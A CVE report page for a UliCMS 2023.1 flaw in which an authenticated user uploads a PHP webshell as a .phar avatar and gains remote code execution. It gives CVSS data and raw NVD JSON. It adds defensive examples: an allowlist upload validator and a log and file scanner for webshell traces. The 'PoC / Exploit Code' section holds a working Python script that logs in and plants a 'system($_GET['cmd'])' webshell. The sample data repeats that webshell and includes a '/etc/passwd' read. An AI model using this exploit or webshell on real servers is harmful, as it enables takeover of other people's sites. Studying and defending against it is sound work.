Security Vulnerability Report
CVE-2023-53924 CVSS 8.8 HIGH

CVE-2023-53924

Published: 2025-12-17 23:15:52
Last Modified: 2025-12-18 19:38:40

Description

UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads.
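The description pins the flaw on the extension check: the avatar upload refuses .php but not .phar, and on stock Debian/Ubuntu Apache installs the bundled PHP module config (`<FilesMatch ".+\.ph(ar|p|tml)$">`) hands .phar to the PHP handler, so the uploaded file runs as code. Any registered low-privilege account is enough (PR:L, UI:N). The example below is added here and is not UliCMS code or anything from the advisory: a denylist-style check that models the weakness, beside an allowlist check that validates the extension, the image magic bytes and the content, then renames the file server-side. The PNG/GIF sample bytes, the webshell string and the extension lists are constructed for illustration.

```python
import os
import secrets

# Constructed sample inputs (not from the advisory): the PoC's webshell text and
# an 8-byte PNG signature standing in for a real image.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

# --- Vulnerable pattern: denylist of "known bad" extensions -------------------
# Hypothetical model of the flawed check; it is not UliCMS's actual code.
DENYLIST = {".php", ".php3", ".php4", ".php5", ".phtml"}


def denylist_allows(filename: str) -> bool:
    """True if a denylist check would accept the upload. '.phar' is not listed."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


# --- Hardened check: allowlist extension, verify magic bytes, rename ----------
ALLOWED = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
# Open tags scanned for inside otherwise valid images (image/PHP polyglots).
# Add b"<?" as well if the target runs with short_open_tag=On.
PHP_MARKERS = (b"<?php", b"<?=")


def allowlist_accepts(filename: str, data: bytes) -> bool:
    """Accept only allowlisted image extensions whose bytes match and carry no PHP tag."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False                       # .phar, .php, .htaccess, ... all rejected
    if not data.startswith(ALLOWED[ext]):
        return False                       # the extension lies about the content
    lowered = data.lower()
    if any(marker in lowered for marker in PHP_MARKERS):
        return False                       # GIF89a<?php ... ?> style polyglot
    return True


def stored_name(filename: str) -> str:
    """Server-chosen name: random token plus the validated extension, never the client's name."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print("denylist accepts avatar.phar:", denylist_allows("avatar.phar"))
    print("allowlist accepts avatar.phar:", allowlist_accepts("avatar.phar", PHP_SHELL))
    print("allowlist accepts avatar.png:", allowlist_accepts("avatar.png", PNG_IMAGE))
    print("stored as:", stored_name("avatar.png"))
```

The client-supplied Content-Type header is deliberately ignored; the PoC sends `application/octet-stream` and could just as easily send `image/png`. Renaming on the server also defuses double-extension names such as `x.php.png` on hosts with `AddHandler`-style mod_mime rules. Independently of the check, the upload directory should be served with the PHP handler removed (`php_admin_flag engine off` or an equivalent `<FilesMatch>` denying script extensions), so that a bypass of the validator still yields a download rather than code execution.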

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score
8.7 (HIGH)
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

cpe:2.3:a:ulicms:ulicms:2023.1:*:*:*:*:*:*:* - VULNERABLE
UliCMS 2023.1-sniffing-vicuna

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2023-53924 PoC - UliCMS Avatar Upload RCE
# Target: UliCMS 2023.1
# Authentication required: Low privilege user account

TARGET_URL = "http://target-website.com"
USERNAME = "attacker"
PASSWORD = "attacker123"


def login():
    """Authenticate and get session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/admin/index.php"
    data = {
        "user": USERNAME,
        "password": PASSWORD,
        "action": "login"
    }
    response = session.post(login_url, data=data)
    return session if "success" in response.text else None


def upload_malicious_avatar(session):
    """Upload PHP shell as avatar"""
    upload_url = f"{TARGET_URL}/admin/index.php?action=profile"
    # PHP webshell payload; the .phar extension is what slips past the upload check
    php_payload = "<?php system($_GET['cmd']); ?>"
    files = {
        "avatar": ("avatar.phar", php_payload, "application/octet-stream")
    }
    response = session.post(upload_url, files=files)
    return response


def execute_command(file_url, cmd):
    """Execute command via uploaded webshell"""
    # Not called from __main__: the PoC leaves locating the stored file to the operator
    exploit_url = f"{file_url}?cmd={cmd}"
    response = requests.get(exploit_url)
    return response.text


if __name__ == "__main__":
    print("[*] CVE-2023-53924 UliCMS RCE Exploit")
    session = login()
    if session:
        print("[+] Login successful")
        upload_malicious_avatar(session)
        print("[+] Malicious avatar uploaded")
        print("[*] Access uploaded file and use ?cmd=<command> to execute")
    else:
        print("[-] Login failed")
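The PoC leaves two traces a defender can look for: the GET requests to the stored avatar with a `?cmd=` query, and a file with a PHP open tag sitting in the avatar directory. The example below is added here and is not from the advisory or the ExploitDB entry: a detection pass that parses Apache combined-format access log lines for requests that execute a script-extension file under the avatar directory, plus a content scan of that directory for PHP open tags regardless of file name. The log lines are constructed, and `/content/avatars/` is an assumed location for the avatar store, not a path taken from UliCMS.

```python
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (sample data, not real traffic).
# /content/avatars/ is an assumed avatar directory for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Dec/2025:10:01:02 +0000] "GET /content/avatars/12.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Dec/2025:10:02:40 +0000] "GET /content/avatars/avatar.phar?cmd=id HTTP/1.1" 200 61 "-" "python-requests/2.31"
10.0.0.9 - - [17/Dec/2025:10:02:41 +0000] "GET /content/avatars/avatar.phar?cmd=cat%20/etc/passwd HTTP/1.1" 200 2300 "-" "python-requests/2.31"
10.0.0.7 - - [17/Dec/2025:10:03:00 +0000] "GET /index.php?cmd=foo HTTP/1.1" 200 800 "-" "curl/8.0"
10.0.0.9 - - [17/Dec/2025:10:04:00 +0000] "GET /content/avatars/shell.php HTTP/1.1" 404 200 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_PREFIX = "/content/avatars/"                     # assumption, see above
EXEC_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".phps")
SHELL_PARAMS = {"cmd", "c", "exec", "command"}          # common webshell parameter names


def classify(line):
    """Return an alert dict for a request that executes a file in the upload dir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    # Only the upload directory is in scope: ?cmd= on a legitimate script is noise here.
    if not (path.startswith(UPLOAD_PREFIX) and path.endswith(EXEC_EXTS)):
        return None
    shell_param = bool(SHELL_PARAMS.intersection(parse_qs(url.query)))
    served = m.group("status") == "200"
    severity = "high" if served and shell_param else "medium"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": m.group("status"), "shell_param": shell_param,
            "severity": severity}


def scan_log(text):
    """All alerts for a block of access-log text, in log order."""
    return [a for a in map(classify, text.splitlines()) if a]


def find_php_in_dir(directory):
    """Content check: any file under the upload dir carrying a PHP open tag, whatever its name."""
    hits = []
    for root, _, names in os.walk(directory):
        for name in names:
            with open(os.path.join(root, name), "rb") as fh:
                head = fh.read(64 * 1024).lower()
            if b"<?php" in head or b"<?=" in head:
                hits.append(name)
    return sorted(hits)


def build_sample_upload_dir():
    """Constructed upload directory: a PNG-looking file, the PoC's .phar, and a GIF/PHP polyglot."""
    d = tempfile.mkdtemp(prefix="avatars_")
    samples = {
        "12.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "avatar.phar": b"<?php system($_GET['cmd']); ?>",
        "cute.gif": b"GIF89a" + b"\x00" * 16 + b"<?php echo 1; ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print("files with PHP tags:", find_php_in_dir(build_sample_upload_dir()))
```

The log rule is scoped to the upload prefix on purpose: `/index.php?cmd=foo` is not flagged, because a `cmd` parameter on a real script says nothing by itself, while any script-extension path under a directory that should only ever hold images is suspicious even on a 404 (it shows someone probing for a dropped file). The content scan complements the log rule for the case where the server never logged the execution, or where the file was stored under an image extension and executed through some other handler misconfiguration.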

References

https://web.archive.org/web/20230314183734/https://en.ulicms.de/ (Product)
https://www.exploit-db.com/exploits/51434 (Exploit)
https://www.vulncheck.com/advisories/ulicms-sniffing-vicuna-remote-code-execution-via-avatar-upload (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53924", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:51.580", "lastModified": "2025-12-18T19:38:40.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ulicms:ulicms:2023.1:*:*:*:*:*:*:*", "matchCriteriaId": "CF295D7E-7EE5-4EB2-89EB-4430EDAEA71E"}]}]}], "references": [{"url": "https://web.archive.org/web/20230314183734/https://en.ulicms.de/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51434", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/ulicms-sniffing-vicuna-remote-code-execution-via-avatar-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51434", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}